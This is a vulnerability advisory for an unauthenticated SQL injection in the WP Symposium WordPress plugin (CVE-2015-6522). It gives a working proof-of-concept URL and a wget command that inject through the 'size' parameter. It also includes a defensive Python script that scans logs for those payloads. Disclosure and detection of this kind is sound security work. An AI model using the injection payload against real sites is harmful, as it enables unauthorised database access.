WP Symposium <= 15.5.1 - Unauthenticated SQL Injection



Description
The WordPress plugin wp-symposium, version 15.5.1 (and probably all earlier versions), is affected by an unauthenticated SQL injection in get_album_item.php through the 'size' parameter.

The issue is exploitable even if the plugin is deactivated, because the vulnerable script is requested directly by its path under wp-content/plugins.

Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

The body of the HTTP response contains the MySQL version, for example:
5.5.44-0+deb7u1
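
A defender-side check for the request pattern above, as an added example that is not part of the original advisory or of the plugin's code: it scans web server access logs for requests to get_album_item.php whose 'size' parameter is not a plain identifier. The log lines are constructed, and the rule that a benign 'size' value is a short identifier (such as the sample value "thumbnail") is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path named in the advisory, under any WordPress install prefix.
TARGET = "/wp-content/plugins/wp-symposium/get_album_item.php"
# Assumption: a benign 'size' value is a short plain identifier.
SAFE_SIZE = re.compile(r"[A-Za-z0-9_]{1,32}")
# Client, request URL and status of a common/combined-format log entry.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" (\d{3})')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %2528 is treated like '('."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client, status, decoded size) for hits with a non-identifier 'size'."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, url, status = m.groups()
        parts = urlsplit(url)
        if not parts.path.lower().endswith(TARGET):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("size", []):
            size = fully_decode(raw)
            if not SAFE_SIZE.fullmatch(size):
                findings.append((client, int(status), size))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Aug/2015:10:00:01 +0000] "GET /blog/wp-content/plugins/wp-symposium/get_album_item.php?size=thumbnail HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Aug/2015:10:02:13 +0000] "GET /blog/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- HTTP/1.1" 200 16',
    '198.51.100.7 - - [09/Aug/2015:10:02:20 +0000] "GET /blog/wp-content/plugins/wp-symposium/get_album_item.php?size=version%2528%2529 HTTP/1.1" 200 16',
    '203.0.113.5 - - [09/Aug/2015:10:05:00 +0000] "GET /blog/index.php?size=version%28%29 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for client, status, size in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} size={size!r}")
```

Because the script is reachable even when the plugin is deactivated, any hit on this path on a site that no longer uses the plugin is worth reviewing, not only the flagged ones.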

Affects Plugin

fixed in version 15.8
- plugin closed

References

CVE 2015-6522
ExploitDB 37824
URL https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter PizzaHatHacker
Views 4948
Verified Yes
WPVDB ID 8140

Timeline

Publicly Published 2015-08-09
Added 2015-08-09
Last Updated 2019-10-22
